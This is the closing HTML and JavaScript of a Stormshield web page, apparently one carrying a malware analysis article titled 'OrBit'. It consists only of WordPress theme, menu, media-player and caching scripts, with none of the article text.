<script type='text/javascript' id='rocket-browser-checker-js-after'>
"use strict";var _createClass=function(){function defineProperties(target,props){for(var i=0;i<props.length;i++){var descriptor=props[i];descriptor.enumerable=descriptor.enumerable||!1,descriptor.configurable=!0,"value"in descriptor&&(descriptor.writable=!0),Object.defineProperty(target,descriptor.key,descriptor)}}return function(Constructor,protoProps,staticProps){return protoProps&&defineProperties(Constructor.prototype,protoProps),staticProps&&defineProperties(Constructor,staticProps),Constructor}}();function _classCallCheck(instance,Constructor){if(!(instance instanceof Constructor))throw new TypeError("Cannot call a class as a function")}var RocketBrowserCompatibilityChecker=function(){function RocketBrowserCompatibilityChecker(options){_classCallCheck(this,RocketBrowserCompatibilityChecker),this.passiveSupported=!1,this._checkPassiveOption(this),this.options=!!this.passiveSupported&&options}return _createClass(RocketBrowserCompatibilityChecker,[{key:"_checkPassiveOption",value:function(self){try{var options={get passive(){return!(self.passiveSupported=!0)}};window.addEventListener("test",null,options),window.removeEventListener("test",null,options)}catch(err){self.passiveSupported=!1}}},{key:"initRequestIdleCallback",value:function(){!1 in window&&(window.requestIdleCallback=function(cb){var start=Date.now();return setTimeout(function(){cb({didTimeout:!1,timeRemaining:function(){return Math.max(0,50-(Date.now()-start))}})},1)}),!1 in window&&(window.cancelIdleCallback=function(id){return clearTimeout(id)})}},{key:"isDataSaverModeOn",value:function(){return"connection"in navigator&&!0===navigator.connection.saveData}},{key:"supportsLinkPrefetch",value:function(){var elem=document.createElement("link");return elem.relList&&elem.relList.supports&&elem.relList.supports("prefetch")&&window.IntersectionObserver&&"isIntersecting"in IntersectionObserverEntry.prototype}},{key:"isSlowConnection",value:function(){return"connection"in navigator&&"effectiveType"in navigator.connection&&("2g"===navigator.connection.effectiveType||"slow-2g"===navigator.connection.effectiveType)}}]),RocketBrowserCompatibilityChecker}();
</script>
<script type='text/javascript' id='rocket-preload-links-js-extra'>
/* <![CDATA[ */
var RocketPreloadLinksConfig = {"excludeUris":"\/(?:.+\/)?feed(?:\/(?:.+\/?)?)?$|\/(?:.+\/)?embed\/|\/(index\\.php\/)?(.*)wp\\-json(\/.*|$)|\/refer\/|\/go\/|\/recommend\/|\/recommends\/","usesTrailingSlash":"","imageExt":"jpg|jpeg|gif|png|tiff|bmp|webp|avif|pdf|doc|docx|xls|xlsx|php","fileExt":"jpg|jpeg|gif|png|tiff|bmp|webp|avif|pdf|doc|docx|xls|xlsx|php|html|htm","siteUrl":"https:\/\/www.stormshield.com","onHoverDelay":"100","rateThrottle":"3"};
/* ]]> */
</script>
<script type='text/javascript' id='rocket-preload-links-js-after'>
(function() {
"use strict";var r="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},e=function(){function i(e,t){for(var n=0;n<t.length;n++){var i=t[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(e,i.key,i)}}return function(e,t,n){return t&&i(e.prototype,t),n&&i(e,n),e}}();function i(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}var t=function(){function n(e,t){i(this,n),this.browser=e,this.config=t,this.options=this.browser.options,this.prefetched=new Set,this.eventTime=null,this.threshold=1111,this.numOnHover=0}return e(n,[{key:"init",value:function(){!this.browser.supportsLinkPrefetch()||this.browser.isDataSaverModeOn()||this.browser.isSlowConnection()||(this.regex={excludeUris:RegExp(this.config.excludeUris,"i"),images:RegExp(".("+this.config.imageExt+")$","i"),fileExt:RegExp(".("+this.config.fileExt+")$","i")},this._initListeners(this))}},{key:"_initListeners",value:function(e){-1<this.config.onHoverDelay&&document.addEventListener("mouseover",e.listener.bind(e),e.listenerOptions),document.addEventListener("mousedown",e.listener.bind(e),e.listenerOptions),document.addEventListener("touchstart",e.listener.bind(e),e.listenerOptions)}},{key:"listener",value:function(e){var t=e.target.closest("a"),n=this._prepareUrl(t);if(null!==n)switch(e.type){case"mousedown":case"touchstart":this._addPrefetchLink(n);break;case"mouseover":this._earlyPrefetch(t,n,"mouseout")}}},{key:"_earlyPrefetch",value:function(t,e,n){var i=this,r=setTimeout(function(){if(r=null,0===i.numOnHover)setTimeout(function(){return i.numOnHover=0},1e3);else if(i.numOnHover>i.config.rateThrottle)return;i.numOnHover++,i._addPrefetchLink(e)},this.config.onHoverDelay);t.addEventListener(n,function e(){t.removeEventListener(n,e,{passive:!0}),null!==r&&(clearTimeout(r),r=null)},{passive:!0})}},{key:"_addPrefetchLink",value:function(i){return this.prefetched.add(i.href),new Promise(function(e,t){var n=document.createElement("link");n.rel="prefetch",n.href=i.href,n.onload=e,n.onerror=t,document.head.appendChild(n)}).catch(function(){})}},{key:"_prepareUrl",value:function(e){if(null===e||"object"!==(void 0===e?"undefined":r(e))||!1 in e||-1===["http:","https:"].indexOf(e.protocol))return null;var t=e.href.substring(0,this.config.siteUrl.length),n=this._getPathname(e.href,t),i={original:e.href,protocol:e.protocol,origin:t,pathname:n,href:t+n};return this._isLinkOk(i)?i:null}},{key:"_getPathname",value:function(e,t){var n=t?e.substring(this.config.siteUrl.length):e;return n.startsWith("/")||(n="/"+n),this._shouldAddTrailingSlash(n)?n+"/":n}},{key:"_shouldAddTrailingSlash",value:function(e){return this.config.usesTrailingSlash&&!e.endsWith("/")&&!this.regex.fileExt.test(e)}},{key:"_isLinkOk",value:function(e){return null!==e&&"object"===(void 0===e?"undefined":r(e))&&(!this.prefetched.has(e.href)&&e.origin===this.config.siteUrl&&-1===e.href.indexOf("?")&&-1===e.href.indexOf("#")&&!this.regex.excludeUris.test(e.href)&&!this.regex.images.test(e.href))}}],[{key:"run",value:function(){"undefined"!=typeof RocketPreloadLinksConfig&&new n(new RocketBrowserCompatibilityChecker({capture:!0,passive:!0}),RocketPreloadLinksConfig).init()}}]),n}();t.run();
}());
</script>
<script data-minify="1" type='text/javascript' src='https://www.stormshield.com/wp-content/cache/min/1/wp-content/themes/bridge/js/plugins/doubletaptogo.js?ver=1677083147' id='doubleTapToGo-js' defer></script>
<script type='text/javascript' src='https://www.stormshield.com/wp-content/themes/bridge/js/plugins/modernizr.min.js' id='modernizr-js' defer></script>
<script data-minify="1" type='text/javascript' src='https://www.stormshield.com/wp-content/cache/min/1/wp-content/themes/bridge/js/plugins/jquery.appear.js?ver=1677083147' id='appear-js' defer></script>
<script type='text/javascript' src='https://www.stormshield.com/wp-includes/js/hoverIntent.min.js' id='hoverIntent-js' defer></script>
<script data-minify="1" type='text/javascript' src='https://www.stormshield.com/wp-content/cache/min/1/wp-content/themes/bridge/js/plugins/counter.js?ver=1677083147' id='counter-js' defer></script>
<script data-minify="1" type='text/javascript' src='https://www.stormshield.com/wp-content/cache/min/1/wp-content/themes/bridge/js/plugins/easypiechart.js?ver=1677083147' id='easyPieChart-js' defer></script>
<script data-minify="1" type='text/javascript' src='https://www.stormshield.com/wp-content/cache/min/1/wp-content/themes/bridge/js/plugins/mixitup.js?ver=1677083147' id='mixItUp-js' defer></script>
<script data-minify="1" type='text/javascript' src='https://www.stormshield.com/wp-content/cache/min/1/wp-content/themes/bridge/js/plugins/jquery.prettyPhoto.js?ver=1677083147' id='prettyphoto-js' defer></script>
<script data-minify="1" type='text/javascript' src='https://www.stormshield.com/wp-content/cache/min/1/wp-content/themes/bridge/js/plugins/jquery.fitvids.js?ver=1677083147' id='fitvids-js' defer></script>
<script type='text/javascript' src='https://www.stormshield.com/wp-content/themes/bridge/js/plugins/jquery.flexslider-min.js' id='flexslider-js' defer></script>
<script type='text/javascript' id='mediaelement-core-js-before'>
var mejsL10n = {"language":"en","strings":{"mejs.download-file":"Download File","mejs.install-flash":"You are using a browser that does not have Flash player enabled or installed. Please turn on your Flash player plugin or download the latest version from https:\/\/get.adobe.com\/flashplayer\/","mejs.fullscreen":"Fullscreen","mejs.play":"Play","mejs.pause":"Pause","mejs.time-slider":"Time Slider","mejs.time-help-text":"Use Left\/Right Arrow keys to advance one second, Up\/Down arrows to advance ten seconds.","mejs.live-broadcast":"Live Broadcast","mejs.volume-help-text":"Use Up\/Down Arrow keys to increase or decrease volume.","mejs.unmute":"Unmute","mejs.mute":"Mute","mejs.volume-slider":"Volume Slider","mejs.video-player":"Video Player","mejs.audio-player":"Audio Player","mejs.captions-subtitles":"Captions\/Subtitles","mejs.captions-chapters":"Chapters","mejs.none":"None","mejs.afrikaans":"Afrikaans","mejs.albanian":"Albanian","mejs.arabic":"Arabic","mejs.belarusian":"Belarusian","mejs.bulgarian":"Bulgarian","mejs.catalan":"Catalan","mejs.chinese":"Chinese","mejs.chinese-simplified":"Chinese (Simplified)","mejs.chinese-traditional":"Chinese (Traditional)","mejs.croatian":"Croatian","mejs.czech":"Czech","mejs.danish":"Danish","mejs.dutch":"Dutch","mejs.english":"English","mejs.estonian":"Estonian","mejs.filipino":"Filipino","mejs.finnish":"Finnish","mejs.french":"French","mejs.galician":"Galician","mejs.german":"German","mejs.greek":"Greek","mejs.haitian-creole":"Haitian Creole","mejs.hebrew":"Hebrew","mejs.hindi":"Hindi","mejs.hungarian":"Hungarian","mejs.icelandic":"Icelandic","mejs.indonesian":"Indonesian","mejs.irish":"Irish","mejs.italian":"Italian","mejs.japanese":"Japanese","mejs.korean":"Korean","mejs.latvian":"Latvian","mejs.lithuanian":"Lithuanian","mejs.macedonian":"Macedonian","mejs.malay":"Malay","mejs.maltese":"Maltese","mejs.norwegian":"Norwegian","mejs.persian":"Persian","mejs.polish":"Polish","mejs.portuguese":"Portuguese","mejs.romanian":"Romanian","mejs.russian":"Russian","mejs.serbian":"Serbian","mejs.slovak":"Slovak","mejs.slovenian":"Slovenian","mejs.spanish":"Spanish","mejs.swahili":"Swahili","mejs.swedish":"Swedish","mejs.tagalog":"Tagalog","mejs.thai":"Thai","mejs.turkish":"Turkish","mejs.ukrainian":"Ukrainian","mejs.vietnamese":"Vietnamese","mejs.welsh":"Welsh","mejs.yiddish":"Yiddish"}};
</script>
<script type='text/javascript' src='https://www.stormshield.com/wp-includes/js/mediaelement/mediaelement-and-player.min.js' id='mediaelement-core-js' defer></script>
<script type='text/javascript' src='https://www.stormshield.com/wp-includes/js/mediaelement/mediaelement-migrate.min.js' id='mediaelement-migrate-js' defer></script>
<script type='text/javascript' id='mediaelement-js-extra'>
/* <![CDATA[ */
var _wpmejsSettings = {"pluginPath":"\/wp-includes\/js\/mediaelement\/","classPrefix":"mejs-","stretching":"responsive"};
/* ]]> */
</script>
<script type='text/javascript' src='https://www.stormshield.com/wp-includes/js/mediaelement/wp-mediaelement.min.js' id='wp-mediaelement-js' defer></script>
<script type='text/javascript' src='https://www.stormshield.com/wp-content/themes/bridge/js/plugins/infinitescroll.min.js' id='infiniteScroll-js' defer></script>
<script data-minify="1" type='text/javascript' src='https://www.stormshield.com/wp-content/cache/min/1/wp-content/themes/bridge/js/plugins/jquery.waitforimages.js?ver=1677083147' id='waitforimages-js' defer></script>
<script type='text/javascript' src='https://www.stormshield.com/wp-includes/js/jquery/jquery.form.min.js' id='jquery-form-js' defer></script>
<script type='text/javascript' src='https://www.stormshield.com/wp-content/themes/bridge/js/plugins/waypoints.min.js' id='waypoints-js' defer></script>
<script type='text/javascript' src='https://www.stormshield.com/wp-content/themes/bridge/js/plugins/jplayer.min.js' id='jplayer-js' defer></script>
<script data-minify="1" type='text/javascript' src='https://www.stormshield.com/wp-content/cache/min/1/wp-content/themes/bridge/js/plugins/bootstrap.carousel.js?ver=1677083147' id='bootstrapCarousel-js' defer></script>
<script data-minify="1" type='text/javascript' src='https://www.stormshield.com/wp-content/cache/min/1/wp-content/themes/bridge/js/plugins/skrollr.js?ver=1677083147' id='skrollr-js' defer></script>
<script type='text/javascript' src='https://www.stormshield.com/wp-content/themes/bridge/js/plugins/Chart.min.js' id='chart-js' defer></script>
<script data-minify="1" type='text/javascript' src='https://www.stormshield.com/wp-content/cache/min/1/wp-content/themes/bridge/js/plugins/jquery.easing.1.3.js?ver=1677083147' id='easing-js' defer></script>
<script data-minify="1" type='text/javascript' src='https://www.stormshield.com/wp-content/cache/min/1/wp-content/themes/bridge/js/plugins/abstractBaseClass.js?ver=1677083147' id='abstractBaseClass-js' defer></script>
<script data-minify="1" type='text/javascript' src='https://www.stormshield.com/wp-content/cache/min/1/wp-content/themes/bridge/js/plugins/jquery.countdown.js?ver=1677083147' id='countdown-js' defer></script>
<script type='text/javascript' src='https://www.stormshield.com/wp-content/themes/bridge/js/plugins/jquery.multiscroll.min.js' id='multiscroll-js' defer></script>
<script type='text/javascript' src='https://www.stormshield.com/wp-content/themes/bridge/js/plugins/jquery.justifiedGallery.min.js' id='justifiedGallery-js' defer></script>
<script data-minify="1" type='text/javascript' src='https://www.stormshield.com/wp-content/cache/min/1/wp-content/themes/bridge/js/plugins/bigtext.js?ver=1677083147' id='bigtext-js' defer></script>
<script type='text/javascript' src='https://www.stormshield.com/wp-content/themes/bridge/js/plugins/jquery.sticky-kit.min.js' id='stickyKit-js' defer></script>
<script type='text/javascript' src='https://www.stormshield.com/wp-content/themes/bridge/js/plugins/owl.carousel.min.js' id='owlCarousel-js' defer></script>
<script data-minify="1" type='text/javascript' src='https://www.stormshield.com/wp-content/cache/min/1/wp-content/themes/bridge/js/plugins/typed.js?ver=1677083147' id='typed-js' defer></script>
<script type='text/javascript' src='https://www.stormshield.com/wp-content/themes/bridge/js/plugins/fluidvids.min.js' id='fluidvids-js' defer></script>
<script type='text/javascript' src='https://www.stormshield.com/wp-content/themes/bridge/js/plugins/jquery.carouFredSel-6.2.1.min.js' id='carouFredSel-js' defer></script>
<script type='text/javascript' src='https://www.stormshield.com/wp-content/themes/bridge/js/plugins/lemmon-slider.min.js' id='lemmonSlider-js' defer></script>
<script type='text/javascript' src='https://www.stormshield.com/wp-content/themes/bridge/js/plugins/jquery.fullPage.min.js' id='one_page_scroll-js' defer></script>
<script type='text/javascript' src='https://www.stormshield.com/wp-content/themes/bridge/js/plugins/jquery.mousewheel.min.js' id='mousewheel-js' defer></script>
<script type='text/javascript' src='https://www.stormshield.com/wp-content/themes/bridge/js/plugins/jquery.touchSwipe.min.js' id='touchSwipe-js' defer></script>
<script type='text/javascript' src='https://www.stormshield.com/wp-content/themes/bridge/js/plugins/jquery.isotope.min.js' id='isotope-js' defer></script>
<script type='text/javascript' src='https://www.stormshield.com/wp-content/themes/bridge/js/plugins/packery-mode.pkgd.min.js' id='packery-js' defer></script>
<script data-minify="1" type='text/javascript' src='https://www.stormshield.com/wp-content/cache/min/1/wp-content/themes/bridge/js/plugins/jquery.stretch.js?ver=1677083147' id='stretch-js' defer></script>
<script data-minify="1" type='text/javascript' src='https://www.stormshield.com/wp-content/cache/min/1/wp-content/themes/bridge/js/plugins/imagesloaded.js?ver=1677083147' id='imagesLoaded-js' defer></script>
<script type='text/javascript' src='https://www.stormshield.com/wp-content/themes/bridge/js/plugins/rangeslider.min.js' id='rangeSlider-js' defer></script>
<script data-minify="1" type='text/javascript' src='https://www.stormshield.com/wp-content/cache/min/1/wp-content/themes/bridge/js/plugins/jquery.event.move.js?ver=1677083147' id='eventMove-js' defer></script>
<script data-minify="1" type='text/javascript' src='https://www.stormshield.com/wp-content/cache/min/1/wp-content/themes/bridge/js/plugins/jquery.twentytwenty.js?ver=1677083147' id='twentytwenty-js' defer></script>
<script type='text/javascript' src='https://www.stormshield.com/wp-content/themes/bridge/js/plugins/swiper.min.js' id='swiper-js' defer></script>
<script data-minify="1" type='text/javascript' src='https://www.stormshield.com/wp-content/cache/min/1/wp-content/themes/bridge/js/default_dynamic.js?ver=1677083147' id='bridge-default-dynamic-js' defer></script>
<script type='text/javascript' id='bridge-default-js-extra'>
/* <![CDATA[ */
var QodeAdminAjax = {"ajaxurl":"https:\/\/www.stormshield.com\/wp-admin\/admin-ajax.php"};
var qodeGlobalVars = {"vars":{"qodeAddingToCartLabel":"Adding to Cart...","page_scroll_amount_for_sticky":""}};
/* ]]> */
</script>
<script type='text/javascript' src='https://www.stormshield.com/wp-content/themes/bridge/js/default.min.js' id='bridge-default-js' defer></script>
<script type='text/javascript' src='https://www.stormshield.com/wp-includes/js/comment-reply.min.js' id='comment-reply-js' defer></script>
<script type='text/javascript' src='https://www.stormshield.com/wp-content/plugins/js_composer/assets/js/dist/js_composer_front.min.js' id='wpb_composer_front_js-js' defer></script>
<script type='text/javascript' id='ubermenu-js-extra'>
/* <![CDATA[ */
var ubermenu_data = {"remove_conflicts":"on","reposition_on_load":"off","intent_delay":"300","intent_interval":"100","intent_threshold":"7","scrollto_offset":"50","scrollto_duration":"1000","responsive_breakpoint":"959","accessible":"on","mobile_menu_collapse_on_navigate":"on","retractor_display_strategy":"responsive","touch_off_close":"on","submenu_indicator_close_mobile":"on","collapse_after_scroll":"on","v":"3.8.1","configurations":["main"],"ajax_url":"https:\/\/www.stormshield.com\/wp-admin\/admin-ajax.php","plugin_url":"https:\/\/www.stormshield.com\/wp-content\/plugins\/ubermenu\/","disable_mobile":"off","prefix_boost":"","use_core_svgs":"off","aria_role_navigation":"off","aria_nav_label":"off","aria_expanded":"off","aria_hidden":"off","aria_controls":"","aria_responsive_toggle":"off","icon_tag":"i","esc_close_mobile":"on","keyboard_submenu_trigger":"enter","theme_locations":{"top-navigation":"Top Navigation","mobile-navigation":"Mobile Navigation","popup-navigation":"Fullscreen Navigation"}};
/* ]]> */
</script>
<script type='text/javascript' src='https://www.stormshield.com/wp-content/plugins/ubermenu/assets/js/ubermenu.min.js' id='ubermenu-js' defer></script>
<script type='text/javascript' src='https://maps.googleapis.com/maps/api/js?key=AIzaSyBQAmvrPyZKQwUu7JvqNJi3zzILoKuHuSA&#038;language=en' id='google-maps-js' defer></script>
<script type='text/javascript' src='https://www.stormshield.com/wp-content/plugins/shokola-maps-search/public/js/animatescroll.min.js' id='shokola-maps-search-animatescroll-js' defer></script>
<script type='text/javascript' id='shokola-maps-search-public-js-extra'>
/* <![CDATA[ */
var script_vars = {"template_url":"https:\/\/www.stormshield.com\/wp-content\/themes\/bridge","ajax_url":"https:\/\/www.stormshield.com\/wp-admin\/admin-ajax.php?wpml_lang=en","plugin_url":"https:\/\/www.stormshield.com\/wp-content\/plugins\/shokola-maps-search","ring_image_url":"https:\/\/www.stormshield.com\/wp-content\/themes\/wp-stormshield-theme\/shokola-maps-search\/ring.gif","map_marker_image_url":"https:\/\/www.stormshield.com\/wp-content\/themes\/wp-stormshield-theme\/shokola-maps-search\/map_marker.png","map_marker_active_image_url":"https:\/\/www.stormshield.com\/wp-content\/themes\/wp-stormshield-theme\/shokola-maps-search\/map_marker_active.png","form_elements_onchange_selector":".search-form-input-partners_type, .search-form-input-country, .search-form-input-regions, .search-form-input-region-italy, .search-form-input-type_security, .search-form-input-technologies, .search-form-input-partners"};
/* ]]> */
</script>
<script data-minify="1" type='text/javascript' src='https://www.stormshield.com/wp-content/cache/min/1/wp-content/plugins/shokola-maps-search/public/js/shokola-maps-search-public.js?ver=1677083147' id='shokola-maps-search-public-js' defer></script>
<script data-minify="1" type='text/javascript' src='https://www.stormshield.com/wp-content/cache/min/1/wp-content/themes/wp-stormshield-theme/shokola-maps-search/script.js?ver=1677083147' id='shokola-maps-search-public-specific-js' defer></script>
<script type='text/javascript' id='shokola-js-extra'>
/* <![CDATA[ */
var data_page = {"title":"OrBit: advanced analysis of a Linux dedicated malware"};
/* ]]> */
</script>
<script data-minify="1" type='text/javascript' src='https://www.stormshield.com/wp-content/cache/min/1/wp-content/themes/wp-stormshield-theme/js/shokola.js?ver=1677083147' id='shokola-js' defer></script>
<script>window.lazyLoadOptions=[{elements_selector:"img[data-lazy-src],.rocket-lazyload",data_src:"lazy-src",data_srcset:"lazy-srcset",data_sizes:"lazy-sizes",class_loading:"lazyloading",class_loaded:"lazyloaded",threshold:300,callback_loaded:function(element){if(element.tagName==="IFRAME"&&element.dataset.rocketLazyload=="fitvidscompatible"){if(element.classList.contains("lazyloaded")){if(typeof window.jQuery!="undefined"){if(jQuery.fn.fitVids){jQuery(element).parent().fitVids()}}}}}},{elements_selector:".rocket-lazyload",data_src:"lazy-src",data_srcset:"lazy-srcset",data_sizes:"lazy-sizes",class_loading:"lazyloading",class_loaded:"lazyloaded",threshold:300,}];window.addEventListener('LazyLoad::Initialized',function(e){var lazyLoadInstance=e.detail.instance;if(window.MutationObserver){var observer=new MutationObserver(function(mutations){var image_count=0;var iframe_count=0;var rocketlazy_count=0;mutations.forEach(function(mutation){for(var i=0;i<mutation.addedNodes.length;i++){if(typeof mutation.addedNodes[i].getElementsByTagName!=='function'){continue}
if(typeof mutation.addedNodes[i].getElementsByClassName!=='function'){continue}
images=mutation.addedNodes[i].getElementsByTagName('img');is_image=mutation.addedNodes[i].tagName=="IMG";iframes=mutation.addedNodes[i].getElementsByTagName('iframe');is_iframe=mutation.addedNodes[i].tagName=="IFRAME";rocket_lazy=mutation.addedNodes[i].getElementsByClassName('rocket-lazyload');image_count+=images.length;iframe_count+=iframes.length;rocketlazy_count+=rocket_lazy.length;if(is_image){image_count+=1}
if(is_iframe){iframe_count+=1}}});if(image_count>0||iframe_count>0||rocketlazy_count>0){lazyLoadInstance.update()}});var b=document.getElementsByTagName("body")[0];var config={childList:!0,subtree:!0};observer.observe(b,config)}},!1)</script><script data-no-minify="1" async src="https://www.stormshield.com/wp-content/plugins/wp-rocket/assets/js/lazyload/17.5/lazyload.min.js"></script></body>
</html>	
<!-- This website is like a Rocket, isn't it? Performance optimized by WP Rocket. Learn more: https://wp-rocket.me - Debug: cached@1679065347 -->